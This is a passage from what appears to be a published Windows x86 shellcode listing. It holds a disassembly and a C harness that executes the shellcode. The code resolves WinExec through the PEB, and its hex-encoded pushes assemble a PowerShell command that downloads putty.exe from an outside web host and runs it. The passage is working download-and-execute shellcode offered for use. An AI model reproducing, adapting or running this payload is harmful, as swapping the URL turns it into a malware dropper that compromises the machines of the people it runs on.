0x30] 0x1b: 8b7f0c mov edi, dword ptr [edi + 0xc] 0x1e: 8b7f1c mov edi, dword ptr [edi + 0x1c] 0x21: 8b4708 mov eax, dword ptr [edi + 8] 0x24: 8b7720 mov esi, dword ptr [edi + 0x20] 0x27: 8b3f mov edi, dword ptr [edi] 0x29: 807e0c33 cmp byte ptr [esi + 0xc], 0x33 0x2d: 75f2 jne 0x21 0x2f: 89c7 mov edi, eax 0x31: 03783c add edi, dword ptr [eax + 0x3c] 0x34: 8b5778 mov edx, dword ptr [edi + 0x78] 0x37: 01c2 add edx, eax 0x39: 8b7a20 mov edi, dword ptr [edx + 0x20] 0x3c: 01c7 add edi, eax 0x3e: 89dd mov ebp, ebx 0x40: 81f957696e45 cmp ecx, 0x456e6957 0x46: 0f8530010000 jne 0x17c 0x4c: 8b34af mov esi, dword ptr [edi + ebp*4] 0x4f: 01c6 add esi, eax 0x51: 45 inc ebp 0x52: 390e cmp dword ptr [esi], ecx 0x54: 75f6 jne 0x4c 0x56: 8b7a24 mov edi, dword ptr [edx + 0x24] 0x59: 01c7 add edi, eax 0x5b: 668b2c6f mov bp, word ptr [edi + ebp*2] 0x5f: 8b7a1c mov edi, dword ptr [edx + 0x1c] 0x62: 01c7 add edi, eax 0x64: 8b7caffc mov edi, dword ptr [edi + ebp*4 - 4] 0x68: 01c7 add edi, eax 0x6a: 89d9 mov ecx, ebx 0x6c: b1ff mov cl, 0xff 0x6e: 53 push ebx 0x6f: e2fd loop 0x6e 0x71: 68293b7d22 push 0x227d3b29 0x76: 6865786527 push 0x27657865 0x7b: 687474792e push 0x2e797474 0x80: 6828277075 push 0x75702728 0x85: 6863757465 push 0x65747563 0x8a: 686c457865 push 0x6578456c 0x8f: 685368656c push 0x6c656853 0x94: 686f6e292e push 0x2e296e6f 0x99: 6863617469 push 0x69746163 0x9e: 6870706c69 push 0x696c7070 0xa3: 686c6c2e41 push 0x412e6c6c 0xa8: 6820536865 push 0x65685320 0xad: 682d636f6d push 0x6d6f632d 0xb2: 6865637420 push 0x20746365 0xb7: 682d4f626a push 0x6a624f2d 0xbc: 68284e6577 push 0x77654e28 0xc1: 682729203b push 0x3b202927 0xc6: 682e657865 push 0x6578652e 0xcb: 6875747479 push 0x79747475 0xd0: 682c202770 push 0x7027202c 0xd5: 6865786527 push 0x27657865 0xda: 687474792e push 0x2e797474 0xdf: 68362f7075 push 0x75702f36 0xe4: 68742f7838 push 0x38782f74 0xe9: 6861746573 push 0x73657461 0xee: 6874792f6c push 0x6c2f7974 0xf3: 682f707574 push 0x7475702f 0xf8: 687468616d push 0x6d616874 0xfd: 6873677461 push 0x61746773 0x102: 686c692f7e push 0x7e2f696c 0x107: 687274682e push 0x2e687472 0x10c: 68652e6561 push 0x61652e65 0x111: 682f2f7468 push 0x68742f2f 0x116: 687470733a push 0x3a737074 0x11b: 6828276874 push 0x74682728 0x120: 6846696c65 push 0x656c6946 0x125: 686c6f6164 push 0x64616f6c 0x12a: 68446f776e push 0x6e776f44 0x12f: 686e74292e push 0x2e29746e 0x134: 68436c6965 push 0x65696c43 0x139: 682e576562 push 0x6265572e 0x13e: 68204e6574 push 0x74654e20 0x143: 686a656374 push 0x7463656a 0x148: 68772d4f62 push 0x624f2d77 0x14d: 6820284e65 push 0x654e2820 0x152: 682226207b push 0x7b202622 0x157: 68616e6420 push 0x20646e61 0x15c: 68636f6d6d push 0x6d6d6f63 0x161: 686c6c202d push 0x2d206c6c 0x166: 6872736865 push 0x65687372 0x16b: 68706f7765 push 0x65776f70 0x170: 89e2 mov edx, esp 0x172: 41 inc ecx 0x173: 51 push ecx 0x174: 52 push edx 0x175: ffd7 call edi 0x177: e88dfeffff call 9 0x17c: 8b34af mov esi, dword ptr [edi + ebp*4] 0x17f: 01c6 add esi, eax 0x181: 45 inc ebp 0x182: 813e45786974 cmp dword ptr [esi], 0x74697845 0x188: 75f2 jne 0x17c 0x18a: 817e0450726f63 cmp dword ptr [esi + 4], 0x636f7250 0x191: 75e9 jne 0x17c 0x193: 8b7a24 mov edi, dword ptr [edx + 0x24] 0x196: 01c7 add edi, eax 0x198: 668b2c6f mov bp, word ptr [edi + ebp*2] 0x19c: 8b7a1c mov edi, dword ptr [edx + 0x1c] 0x19f: 01c7 add edi, eax 0x1a1: 8b7caffc mov edi, dword ptr [edi + ebp*4 - 4] 0x1a5: 01c7 add edi, eax 0x1a7: 31c9 xor ecx, ecx 0x1a9: 51 push ecx 0x1aa: ffd7 call edi */ #include<stdio.h> char shellcode[]=\ "\x31\xc9\xb9\x57\x69\x6e\x45\xeb\x04\x31\xc9\xeb\x00\x31\xc0\x31\xdb\x31\xd2\x31\xff\x31\xf6\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x81\xf9\x57\x69\x6e\x45\x0f\x85\x30\x01\x00\x00\x8b\x34\xaf\x01\xc6\x45\x39\x0e\x75\xf6\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x29\x3b\x7d\x22\x68\x65\x78\x65\x27\x68\x74\x74\x79\x2e\x68\x28\x27\x70\x75\x68\x63\x75\x74\x65\x68\x6c\x45\x78\x65\x68\x53\x68\x65\x6c\x68\x6f\x6e\x29\x2e\x68\x63\x61\x74\x69\x68\x70\x70\x6c\x69\x68\x6c\x6c\x2e\x41\x68\x20\x53\x68\x65\x68\x2d\x63\x6f\x6d\x68\x65\x63\x74\x20\x68\x2d\x4f\x62\x6a\x68\x28\x4e\x65\x77\x68\x27\x29\x20\x3b\x68\x2e\x65\x78\x65\x68\x75\x74\x74\x79\x68\x2c\x20\x27\x70\x68\x65\x78\x65\x27\x68\x74\x74\x79\x2e\x68\x36\x2f\x70\x75\x68\x74\x2f\x78\x38\x68\x61\x74\x65\x73\x68\x74\x79\x2f\x6c\x68\x2f\x70\x75\x74\x68\x74\x68\x61\x6d\x68\x73\x67\x74\x61\x68\x6c\x69\x2f\x7e\x68\x72\x74\x68\x2e\x68\x65\x2e\x65\x61\x68\x2f\x2f\x74\x68\x68\x74\x70\x73\x3a\x68\x28\x27\x68\x74\x68\x46\x69\x6c\x65\x68\x6c\x6f\x61\x64\x68\x44\x6f\x77\x6e\x68\x6e\x74\x29\x2e\x68\x43\x6c\x69\x65\x68\x2e\x57\x65\x62\x68\x20\x4e\x65\x74\x68\x6a\x65\x63\x74\x68\x77\x2d\x4f\x62\x68\x20\x28\x4e\x65\x68\x22\x26\x20\x7b\x68\x61\x6e\x64\x20\x68\x63\x6f\x6d\x6d\x68\x6c\x6c\x20\x2d\x68\x72\x73\x68\x65\x68\x70\x6f\x77\x65\x89\xe2\x41\x51\x52\xff\xd7\xe8\x8d\xfe\xff\xff\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x45\x78\x69\x74\x75\xf2\x81\x7e\x04\x50\x72\x6f\x63\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x31\xc9\x51\xff\xd7"; main(){(* (int(*)()) shellcode)();}